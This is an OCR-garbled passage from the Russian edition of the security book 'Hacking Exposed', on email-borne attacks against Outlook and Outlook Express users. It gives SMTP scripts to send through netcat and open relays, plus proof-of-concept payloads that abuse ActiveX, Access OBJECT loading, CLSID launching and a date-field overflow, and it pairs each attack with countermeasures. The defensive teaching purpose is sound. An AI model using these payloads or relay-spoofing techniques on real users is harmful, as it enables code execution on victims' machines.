Стюарт Мак-Клар, Джоел Скембрэй, Джордж Куртц. Секреты хакеров. Безопасность сетей - готовые решения
Подождите немного. Документ загружается.
тивным
средством, входящим в набор пользователя Internet, которое помогает ему
комфортно чувствовать себя в
киберпространстве.
Интересен тот факт, что два чрез-
вычайно популярных протокола Internet, HTTP и SMTP, имеют много точек сопри-
косновения, что чрезвычайно увеличивает потенциальную опасность. Сообщения
электронной почты в формате HTML — эффективное средство направленного взлома
многих броузеров. Для подобных атак можно применять многие из ранее описанных
методов, а возможно, и какие-то другие. Добавьте в электронные сообщения неболь-
шое количество мобильного кода — и процесс проникновения в системы доверчивых
пользователей станет во многом похож на детскую игру.
(Хотя
в этом разделе речь идет исключительно об электронной почте, ясно,
что описываемые приемы применимы также и к сообщениям групп новостей
Internet. Такая тактика может привести даже к еще более массовым разруше-
ниям, чем
"спэм",
при котором используются данные методы.
Сто один способ взлома электронной почты
Перед тем как углубиться в обсуждение конкретных видов атак, важно понять, как
можно отправить электронное сообщение со злым умыслом. На самом деле сделать это
сложнее, чем может показаться на первый взгляд. Большинство современных графических
клиентских приложений электронной почты не позволяет оперировать непосредственно с
блоком заголовка сообщения SMTP. Ирония состоит в том, что, несмотря на недовольст-
во, которое вызывают изъяны программных продуктов компании Microsoft, проявляющие-
ся во время приема сообщений, отправить созданный взломщиком код HTML с помо-
щью таких программ, как Outlook или Outlook Express, крайне трудно. Конечно же, поль-
зователи UNIX для подобных манипуляций могут воспользоваться традиционными
почтовыми клиентами, которые можно использовать из командной строки.
В системе Windows авторам нравится отправлять сообщения вручную из команд-
ной строки прямо на сервер SMTP. Лучше всего для этого воспользоваться конвейе-
ром, в котором текстовый файл с соответствующими командами SMTP и данными
передается через утилиту netcat. Вот как это делается.
Во-первых, необходимо создать файл с нужными командами SMTP и данными со-
общения (назовем его
malicia.txt).
При этом, чтобы электронное письмо было
правильно отформатировано, важно придерживаться правильного синтаксиса MIME
(Multipurpose Internet Mail Extensions). Обычно такие сообщения отправляют в форма-
те HTML, так что само тело сообщения представляет собой часть реализации ковар-
ного замысла. В следующем примере главной частью, в которой важно соблюдать
синтаксис, являются три строки, начинающиеся со строки
MiME-version:
1.0.
helo
mail from:
<mallory@malweary.com>
rcpt to:
<hapless@victim.net>
data
subject: Read
this!
Importance:
high
MIME-Version:
1.0
Content-Type:
text/html;
charset=us-ascii
Content-Transfer-Encoding: 7bit
<HTML>
<h2>Hello
World!</h2>
</HTML>
quit
Глава 16. Атаки на пользователей Internet 665
Затем в командной строке нужно ввести имя этого файла и передать его через
конвейер утилите
net
cat, для которой следует указать соответствующий почтовый
сервер с прослушиваемым SMTP-портом 25.
type
malioious.txt
| no
-w
mail.openrelay.net
25
Наверное, понятно и без слов, что хакеры, скорее всего, выберут неприметный
почтовый сервер, который допускает неограниченную передачу сообщений SMTP, и
постараются скрыть свой собственный IP-адрес, чтобы его нельзя было выследить с
помощью журналов почтовых серверов.
Такие "открытые каналы пересылки SMTP" часто используются
"спэмерами".
Их можно легко отыскать в новостях Usenet или найти на Web-узле
http://mail-abuee.org.
Если вместе с
сообщением
в формате HTML нужно отправить вложение, то сде-
лать это несколько сложнее. Для этого в сообщение необходимо добавить другую
часть в формате MIME и закодировать вложение в формате Base64 в
соответствии
со
спецификацией
MIME (см. RFC 2045-49). Лучше всего воспользоваться для этой це-
ли утилитой Джона Майерса (John G. Myers)
mpack,
которую можно
найти
по адресу
http://www.21st-century.net/Pub/Utilities/Archieves/.
Программа mpack
изящно добавляет соответствующие заголовки MIME, так что получившийся резуль-
тат можно сразу отравлять прямо на сервер SMTP. Ниже приведен пример того, как с
помощью утилиты mpack зашифровать файл
plant.
txt и записать полученные дан-
ные в файл
plant.mim.
Параметр -s задает содержимое поля с темой сообщения и не
является
обязательным,
mpack
-s
Nasty-gram
-о
plant.mim
plant.txt
Теперь начинается более сложная часть. Этот фрагмент в формате MIME нужно
вставить в уже существующее сообщение HTML. Воспользуемся уже знакомым при-
мером,
malicia.txt,
и разделим это сообщение с помощью обычных разделителей
MIME. Перед разделителями MIME ставится два символа -, а в закрывающих разде-
лителях два этих символа вводятся еще и после разделителей. Кроме того, постарай-
тесь
не
забыть поместить часть
сообщения
MIME
multipart/alternative
(boundary2),
чтобы адресаты смогли расшифровать тело сообщения HTML с помо-
щью программы Outlook. Следует обращать внимание на размещение символов пере-
вода каретки, так как от этого зависит интерпретация сообщения. Заметим, что пара-
метру этого сообщения importance присвоено значение high. Это еще один прием,
направленный на заманивание жертвы.
helo
somedomain.com
mail from:
<mallory@malweary.com>
rcpt to: <hapless@victim.net>
data
subject: Read
this!
Importance: high
MIME-Version:
1.0
Content-Type:
multipart/mixed;
boundary="_boundaryl_"
--_boundaryl_
Content-Type:
multipart/alternative;
boundary="_boundary2
"
Часть IV.
Хакинг
программного обеспечения
Content-Type:
text/html;
charset=us-ascii
<HTML>
<h2>Hello
World!</h2>
</HTML>
—_boundary2_—
—_boundaryl_
Content-Type:
application/octet-stream;
name="plant.txt"
Content-ID: <5551212>
Content-Transfer-Encoding:
base64
Content-Disposition:
inline;
filename="plant.txt"
Content-MD5:
Psn+mcJEvOfPwoEc40XYTA==
SSBjb3VsZGEgaGFja2VkIHlhIGJhZCANCg==
--_boundaryl_--
quit
После передачи этого файла с помощью утилиты netcat на доступный сервер
SMTP
сообщение
в
формате HTML
с
вложенным файлом
plant.
txt
будет
доставле-
но по адресу hapless@victim.net. Чтобы лучше понять применение разделителей
MIME в сообщениях, состоящих из нескольких частей, см. раздел
5.1.1
документа
RFC 2046, который можно найти по адресу
ftp://ftp.isi.edu/in-
notes/rfc2046.
txt. Кроме того, в качестве полезного упражнения можно отправить
тестовое сообщение на свой адрес и просмотреть его с помощью приложения Outlook
Express. Затем нужно щелкнуть правой кнопкой на данном
сообщении
и в контекст-
ном меню выбрать команду
Properties
i=
>Details
c
>Message
Source, чтобы просмотреть
сообщение в необработанном виде.
В данной главе авторы будут ссылаться на этот метод как на "капсулу для взлома
почты". Теперь, чтобы представить себе степень риска, которую на самом деле пред-
ставляет собой атака через электронную почту, посмотрим, как этот общий метод
применяется в некоторых реальных атаках.
О Контрмеры: взлом электронной почты
Очевидной мерой является отключение возможности получения почтовым клиентом
сообщений в формате HTML. К сожалению, для современных почтовых программ сде-
лать это либо сложно, либо невозможно. Кроме того, следует отключить и возможность
использования технологий мобильного кода. В разделе, посвященном описанию зон
безопасности, уже упоминалось, как это сделать, но для надежности авторы решили еще
раз повторить этот совет. В приложениях Outlook и Outlook Express выберите команду
Tools^Options,
перейдите во вкладку Security и выберите зону Restricted Sites, как это
показано на рис. 16.2. (Не забывайте, что этот параметр не будет применяться при про-
смотре Web-страниц в броузере Internet Explorer, в котором используются свои собст-
венные параметры.) Один только этот прием поможет избежать многих перечисленных
ниже проблем, поэтому настоятельно рекомендуем воспользоваться этой возможностью.
Безусловно, важно также соблюдать осторожность при работе с вложениями элек-
тронных сообщений. Первой инстинктивной реакцией большинства людей на воз-
никновение проблем, подобных появлению вируса ILOVEYOU (см. ниже), — обви-
нить во всем разработчика программного обеспечения. Однако на самом деле почто-
вые программы требуют определенных навыков и со стороны пользователя. Модуль
обновления Outlook, который можно получить по адресу
http:
//office.microsoft.
Глава 16. Атаки на пользователей Internet 667
com/downloads/2000/0ut2ksec.aspx,
усложняет пользователям
процесс
запуска
вложений, заставляя их перед этим по крайней мере два раза щелкать в появляющих-
ся диалоговых окнах (кстати, этот модуль устанавливает еще и зону безопасности Re-
stricted Sites). Как вы увидите немного ниже, это не просто защита от дураков. Такая
мера значительно поднимает барьерную планку для возможных взломщиков. Обыч-
ный здравый смысл тоже поможет в этом: не открывайте сообщения и не загружайте
вложения, которые пришли от незнакомых людей!
Запуск произвольного кода с помощью
электронной почты
При описании следующих атак будут продемонстрированы различные механизмы
запуска команд на целевом компьютере. Многие из них приводятся в действие при
открытии коварных сообщений или их предварительном просмотре в соответствую-
щей части окна программ
Outlook
и Outlook Express.
Атаки с использованием элементов ActiveX,
помеченных как "Safe for Scripting"
Популярность
Простота
Опасность
Степень риска
5
6
10
7
Взломщики не могли выдумать ничего более убийственного: все, что нужно сделать
жертве, — это просто прочитать сообщение (или просмотреть его в окне предваритель-
ного просмотра программ Outlook и Outlook Express, если такая
возможность
имеется).
При этом со стороны
пользователя
не требуется никаких действий. Эта чудовищная
"простота" снова появилась благодаря элементу управления
Scriptlet.
typplib,
поме-
ченному как "safe for
scripting"
(более подробно этот вопрос обсуждается в разделе, по-
священном элементам ActiveX). С такой же легкостью можно использовать
Eyegod.ocx,
но метод, рассматриваемый в данном разделе, основан на применении проверочного
кода Георгия
Гунински,
в
котором используется элемент управления
Scriptlet.
typelib.
Напомним,
что
Георгий поместил этот
код на
своем Web-узле
http://www.
guninski.com/scrtlb-desc.html.
Ниже приведена слегка модифицированная версия
этого кода, вставленного в капсулу для взлома почты.
helo
somedomain.com
mail from:
<mallory@malweary.com>
rcpt to:
<hapless@victim.net>
data
subject:
Ya
gotta read
this!
MIME-Version:
1.0
Content-Type:
text/html;
charset=us-ascii
Content-Transfer-Encoding:
7bit
If you have received this message in error, please delete
it.
<object
id="scr"
classid="clsid:06290BD5-48AA-llD2-8432-0060Q8C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\WIN98\\start
menu\\programs\\startupX\guninski^hta";
668 Часть IV. Хакинг программного обеспечения
scr
.
Doc="<object
id=
'wsh'
classid=
'clsid:
F935DC22-1CFO-11DO-ADB9
OOC04FD58AOB'x/objectXSCRIPT>alert
(
'Written
by Georgi
Guninski
http:
//www.guninski.
com'
)
;wsh.Run
(
'c:
\\WIN98\\coinmand.
com'
)
;</"+
scr
.write
(}
;
</SCRIPT>
</object>
quit
Этот код позволяет реализовать атаку, состоящую из двух
этапов.
Во-первых, он
создает в папке startup на компьютере пользователя файл приложения HTML (с
расширением
.hta)
и записывает в него содержимое сценария. Этот файл создается
почти незаметно для пользователя, пока он просматривает сообщение (если внима-
тельно следить за световым индикатором жесткого диска, то можно заметить его мер-
цание). Вот как выглядит наше тестовое сообщение в папке Inbox (ниже на рисунке
показано окно программы Outlook Express). Для завершения взлома достаточно, чтобы
сообщение отобразилось в окне предварительного просмотра.
; №
Р*
Ret*
л
oe
• a
ReptfAl
Fomwd
'
Print
X
Delete
Foldoi
£|
Oullook
Expiess
-
<Q
Local Folders
<£S
Outbox
СЭ
Sent
Items
Q
Deleted
Ib»
Ф
Oialts
I
-1
! |
Oj.y
| FionT
I Subnet
FiMt:
maiceut®ett«ckei,ilet
To:
,
Sublet:
Yagdla
mad
1Ы
IF
you have received this message
m
error,
please delete
it
П
messagefsb
Q
umead
Следующий этап произойдет, когда пользователь перезагрузит компьютер. Рано
или поздно это обязательно случится. Конечно же, можно написать такой сценарий,
который сам выполнял бы перезагрузку. При этом запустится файл . НТА (данные
файлы автоматически интерпретируются командной оболочкой Windows). В нашем
случае пользователь получит следующее
"приветственное"
сообщение.
Эти безобидные действия — одна из многих реализаций в безбрежном море воз-
можностей. В подобной ситуации жертва полностью находится в руках взломщика.
Действие
так
называемого червя
КАК
основано
на
изъяне
Scriptlet,
который
тоже можно использовать для охоты на доверчивых (и не пользующихся модулями
обновления) пользователей Outlook и ОЕ. Более подробную информацию о "черве"
КАК можно найти по адресу
http://www.symantec.com/avcenter/venc/data/
wscript.kakworm.html.
Глава 16. Атаки на пользователей Internet
669
О Контрмеры
Примените
модули
обновления
для
компонентов
ActiveX
Scriptlet
и
Eyedog,
ко-
торые можно получить по адресу
http://www.microsoft.com/technet/security/
bulletin/ms99-032.asp.
Еще раз следует напомнить, что данные модули обновления позволят устранить
проблему, связанную только с данными компонентами. Более универсальной мерой
является отключение в программах электронной почты возможности применения
элементов ActiveX. Используемая для этого процедура описана в
разделе,
в котором
рассматриваются зоны безопасности.
"Запуск" документов MS Office
с помощью элементов ActiveX
Популярность
Простота
Опасность
Степень риска
5
5
10
7
Георгий
Гунински
не ограничил свои изыскания использованием дескрипторов
HTML в электронном сообщении для загрузки потенциально опасных элементов
управления ActiveX. В последующих информационных сообщениях, опубликованных
на его узле,
сообщается,
что с помощью этого же метода могут быть "запущены" и
потенциально опасные документы Microsoft Office ("поведение" этих документов
очень похоже на поведение элементов управления ActiveX). С результатами исследо-
ваний можно ознакомиться по адресу
http://www.guninski.com/sheetex-desc.
html (для документов Excel и PowerPoint) и http://www.guninski.com/access-desc.
html (здесь описывается процедура запуска кода VBA, содержащегося в базах данных
Access).
Руководствуясь двумя соображениями, в этом разделе будет рассмотрена вторая из этих
возможностей. Во-первых, вопросы, связанные с Excel и PowerPoint, более интересны вви-
ду способности этих приложений незаметно записывать файлы на диск,
что
будет обсуж-
даться в последующих разделах. Во-вторых, изъян, основанный на
использовании
Access,
по мнению большинства специалистов в области обеспечения безопасности, является бо-
лее серьезным, поскольку справиться с ним не помогают все те меры предосторожности,
которые применяются для защиты от элементов управления ActiveX. Даже если полностью
запретить их использование, система все равно остается уязвимой. Вот как высоко оцени-
ли серьезность этой проблемы специалисты института SANS: "Возможно,
3to
одна из са-
мых опасных ошибок, допущенных компанией Microsoft в программах для рабочих стан-
ций Windows (всего
ряда—
95, 98, 2000, NT 4.0)" (см.
http://www.sans.org/newlook/
resources/win_flaw.htm).
Грустно, что это замечание, которое на первый взгляд напол-
нено сенсуализмом, на самом деле может оказаться не так далеко от истины.
Проблема заключается в том способе, который в системе Windows используется
для проверки файлов Access
(.
MDB) при их загрузке в Internet Explorer с помощью де-
скриптора OBJECT, как показано в следующем фрагменте кода HTML, предоставлен-
ного Георгием Гунински.
<OBJECT
data="db3.mdb"
id="dl"x/OBJECT>
Как только Internet Explorer встречает дескриптор объекта,
загружается
база дан-
ных Access, имя которой задано в параметре data=, а затем для ее открытия вызыва-
ется программа Access. Это происходит перед тем, как пользователь получит преду-
670 Часть IV. Хакинг программного
обеспечения
преждение
о потенциальной опасности, которая при этом может возникнуть. Таким
образом, база данных будет запущена независимо от того, настроен
IE/Outlook/OE
для запуска элементов управления ActiveX или нет. Ну и дела!
Пример Георгия основан на применении удаленного файла с именем
db3.mdb,
кото-
рый он разместил на своем Web-узле. Этот файл представляет собой базу данных Access,
где находится одна форма, запускающая текстовый редактор Wordpad. Вот еще одна кап-
сула для взлома электронной почты, демонстрирующая, как можно реализовать эту атаку.
helo
somedomain.com
mail from:
<mallory@attack.net>
rcpt to:
<hapless@victim.net>
data
subject:
And another
thing!
Importance: high
MIME-Version: 1.0
Content-Type:
text/html;
charset=us-ascii
<HTML>
<h2>Enticing message
here!</h2>
«DBJECT
data="http://www.guninski.com/db3.mdb"
id="dl"X/OBJECT>
</HTML>
quit
В этом примере явно задан URL файла
db3.mdb
(строка 12), чтобы можно было ис-
пользовать его в сообщении электронной почты. Институтом SANS утверждается, что
при доступе и совместном использовании файлов Access через Internet применяется про-
токол SMB. Просто поразительно, сколько
FTP-серверов
предоставляет свои ресурсы
для бесконтрольного размещения данных и доступа к ним. В следующих разделах указа-
ны другие места хранения данных, которые могут заинтересовать взломщиков.
Основной особенностью атак этого типа является то, что обработка этих простых
дескрипторов программами IE/Outlook/OE приводит к запуску файлов, в которых со-
держится мощный макрос VBA. При этом не требуется какого-либо вмешательства
пользователя. Неужели такая перспектива еще никого не встревожила?
Контрмеры: использование пароля
администратора Access
Запрещение использования элементов управления ActiveX не предотвратит воз-
можности реализации описанных атак. Поэтому нужно применить модуль обновления
в
соответствии
с
инструкциями, приведенными
по
адресу
http:
//www.
microsoft.
com/technet/security/bulletin/MSOO-049.asp.
Особое внимание следует обра-
тить на модуль обновления, предназначенный специально для устранения проблемы,
связанной с Access (компания Microsoft назвала ее изъяном "сценария IE" ("IE
Script")).
Этот модуль обновления можно получить
по
адресу
http:
//www.
microsoft.
com/windows
/ie
/download/critical
/pa
tchll.htm.
Компания Microsoft предлагает воспользоваться также следующими рекоменда-
циями, которые будут полезны независимо от того, был ли установлен модуль обнов-
ления. Для Access нужно установить пароль администратора (по умолчанию он не ис-
пользуется). Выполните для этого следующие действия.
1. Запустите Access 2000, но не открывайте никаких баз данных.
2. Выберите команду
Tools^Security.
3. Выберите пункт User and Group Accounts.
Глава 16. Атаки на пользователей Internet 671
4. Выберите пользователя Admin, который должен существовать по
умолчанию.
5. Перейдите во вкладку Change Logon Password.
6. Если до этого не были внесены никакие изменения, пароль администратора
должен быть пустым.
7. Введите пароль администратора.
8. Для выхода щелкните на кнопке ОК.
Это должно предотвратить возможность запуска злонамеренного кода VBA и его
работы с высокими привилегиями. Специалисты SANS также отметили, что блокиро-
вание брандмауэром исходящих запросов на совместное использование файлов Win-
dows (порты TCP 139 и TCP 445) позволит уменьшить вероятность необдуманного за-
пуска пользователями удаленного кода.
°
*
J
»*
°
Запуск файлов с помощью ненулевого
параметра
CLSID
элементов ActiveX
Популярность
Простота
Опасность
Л
Степень риска
Г
5
5
'
10
7
Причиной выявления данного изъяна послужило вскользь сделанное
замечание
в
дискуссии, которая велась в бюллетене Bugtraq (http:
//www.securityijocus.com/
bugtraq/archive)
no
поводу уязвимости, обусловленной "навязыванием" файла
вложения (см. ниже), которую предложили реализовать на узле malware.com.
Ведд
Понд
(Weld Pond), высококлассный хакер из группы
LOpht,
прославившийся благода-
ря утилите netcat для NT (см. главу 5), завел со своим коллегой DilDog из группы
"Cult of Dead Cow", знаменитым автором программы Back Orifice 2000 (см. главы 4 и 14),
разговор о механизме запуска файлов, навязанных пользователям по методике
malware.
com. Оказывается, можно запустить любой файл, поместив в тело электрон-
ного сообщения дескриптор
OBJECT
и сконфигурировав его с помощью ненулевого
параметра
CLSID.
При этом в мишень превращается каждый исполняемый файл, на-
ходящийся на диске пользователя. Ниже приведен пример
соответствующей
капсулы
для взлома электронной почты.
helo
somedomain.com
mail from:
<mallory@attack.net>
rcpt to:
<hapless@victim.net>
data
subject: Read
this!
Importance: high
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
<HTML>
<HEAD>
</HEAD>
<BODY>
<OBJECT
CLASSID=
<
CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE='c:\windows\calc.exe' ></OBJECT>
</BODYX/HTML>
Часть IV. Хакинг программного обеспечения
Обратите внимание на ненулевой параметр
CLSID.
Именно он приводит в дейст-
вие весь механизм. Файл, который будет запушен, задается параметром CODEBASE.
Однако в процессе тестирования выяснилось, что для того, чтобы этот способ ус-
пешно работал, требуется удачное расположение планет. Первое необходимое условие
заключается в том, что нужно, чтобы в программе Outlook Express
5.00.2615.200
для
зоны был установлен уровень безопасности Low. Кроме того, при попытке запуска фай-
ла
calc.exe
из папки System появлялось диалоговое окно с предупреждением о непод-
писанном элементе управления. Для такого стечения обстоятельств пользователи долж-
ны быть достаточно безграмотны. Но если проделать это все же удастся, то появляются
заманчивые перспективы, особенно при использовании этого способа совместно с воз-
можностью записи файлов на диск, предложенной на Web-узле
malware.com.
О Контрмеры: использование ненулевого
параметрасьзхв
Основываясь на результатах тестирования, авторы утверждают, что установка соот-
ветствующего уровня безопасности зоны позволит устранить эту проблему (см. в пре-
дыдущих разделах описание зон безопасности).
Переполнение буфера поля даты
в программах Outlook и Outlook Express
Популярность
Простота
Опасность
Степень риска
:,„
7
9
10
9
Возможно, кому-то из читателей показалось, что "стержнем" большинства типов
атак являются элементы управления ActiveX. 18 июля 2000 года в бюллетене Bugtraq
появилось сообщение об изъяне программ Outlook и Outlook Express совсем другого
типа, не имеющем ничего общего с элементами ActiveX.
Проблема заключается в классическом переполнении буфера, причиной которого
может послужить заполнение раздела GMT (Greenwich Mean Time — среднее время
по Гринвичу) поля даты заголовка электронного сообщения чрезмерно большой пор-
цией данных. В процессе загрузки такого сообщения с использованием протокола
РОРЗ или IMAP4 файл
INCETCOMM.DLL,
который отвечает за анализ значения GMT,
не выполняет необходимой проверки переполнения границ. Это приводит к возник-
новению аварийной ситуации в программах Outlook и Outlook Express и возможности
запуска произвольного кода. Ниже приведен пример кода, работа которого основана
на наличии этого изъяна.
Date:
Tue,
18
July
2000
14:16:06
+<около
1000
байтхкод
для
запуска>
В этой книге уже неоднократно упоминалось, что возможность запуска в системе
произвольного кода открывает неограниченные возможности. Коварное сообщение по-
зволяет незаметно установить программу типа "троянский конь". Через него могут рас-
пространяться "черви", а, кроме того, оно может дискредитировать целевую систему,
запустить вложение — одним словом, делать практически все, что заблагорассудится.
Пользователям Outlook Express достаточно лишь открыть папку с представляющим
опасность сообщением, и они сразу же становятся уязвимыми. Простая загрузка такого
сообщения в процессе проверки почты может привести к переполнению буфера и воз-
никновению исключительной ситуации. Таким образом, пользователи ОЕ попадают в
замкнутый круг: сообщение не может нормально загрузиться, а его содержимое приво-
Глава 16. Атаки на пользователей Internet 673
дат к сбою программы при каждой последующей попытке приема почты. Одним из
способов устранения описанной проблемы является просмотр почты и удаление вы-
звавшего аварию сообщения (при условии, что мы можем его "вычислить") с помощью
почтового клиента, отличного от Outlook/OE. Это легко сделать, используя программу
Netscape Messenger, в окне предварительного просмотра которой отображается дата со-
общения, по которой можно понять, какое из сообщений привело к сбою. Пользователи
Outlook уязвимы во время предварительного просмотра, чтения и пересылки сообщения,
вызывающего неполадки, а также тогда, когда они на него отвечают.
Первоначально код, основанный на данном изъяне, был опубликован
в
бюллетене
Bugtraq.
Однако позже выяснилось, что данный подход можно применять лишь про-
тив сервера, входящего в состав частной локальной сети. Поэтому он неприменим,
если его использовать портив пользователя, подсоединенного к Internet через модем.
Как представляется, эта публикация стала результатом ошибки Аарона Дрю (Aaron
Drew), который, по-видимому, пытался применить подход, подобный описанному в
этой главе методу капсулы для взлома электронной почты, но вместо этого ошибочно
отправил свое сообщение в бюллетень Bugtraq. Подготовленное для официального ог-
лашения, это сообщение выглядело бы следующим образом (обратите внимание на
строку Date, в которой для краткости опущены данные, вызывающие переполнение; в
примере они заключены в квадратные скобки, которые не являются необходимыми).
helo
somedomain.com
mail from:
<mallory@attack.net>
rcpt to:
<hapless@victim.net>
data
Date: Sun, 7 May 2000
11:20:46
+[-1000
байт + код в
шестнадцатеричном
формате или
ascii]
Subject: Date
overflow!
Importance: high
MIME-Version: 1.0
Content-Type:
text/plain; charset=us-ascii
This is a test of the Outlook/OE date field overflow.
quit
Группа Underground Security Systems Research (USSR,
http://www.ussrback.com)
также сообщила о том, что обнаружила эту брешь (по крайней мере, об этом заявил ха-
кер
Метатрон
(Metatron)). Однако, по их утверждению, они не стали сообщать о ней
публично, ожидая, пока Microsoft выпустит соответствующий модуль обновления. На
базе этого изъяна группа USSR опубликовала свою реализацию, что
вызвало
интерес к
их Web-узлу. Код запускается почти таким же образом, как и в
предыдущем;
примере.
ф Контрмеры: переполнение поля даты
Согласно информационному сообщению компании Microsoft,
которое
можно най-
ти на ее Web-узле по адресу
http://www.microsoft.com/technetf/security/
bulletin/MSOO-043.asp,
изъян может быть устранен с помощью модуля обновле-
ния, находящегося по адресу
http://www.microsoft.com/windows/i4/download/
critical/patch9.htm.
Кроме того, эту проблему можно решить, установив одно из следующих обновле-
ний с параметрами, принятыми по умолчанию.
Т Internet Explorer 5.01 Service Pack 1.
a Internet Explorer 5.5 в любой системе за исключением Windows 2000.
674 Часть IV. Хакинг программного обеспечения